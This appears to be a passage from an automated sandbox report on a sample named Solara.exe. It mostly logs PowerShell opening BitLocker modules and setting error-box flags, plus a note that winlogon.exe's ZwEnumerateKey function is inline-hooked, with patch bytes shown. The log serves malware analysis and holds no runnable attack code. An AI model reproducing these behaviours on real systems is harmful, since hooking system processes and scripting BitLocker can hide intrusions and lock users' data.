Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Modifies the prolog of user mode functions (user mode inline hooks)
Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
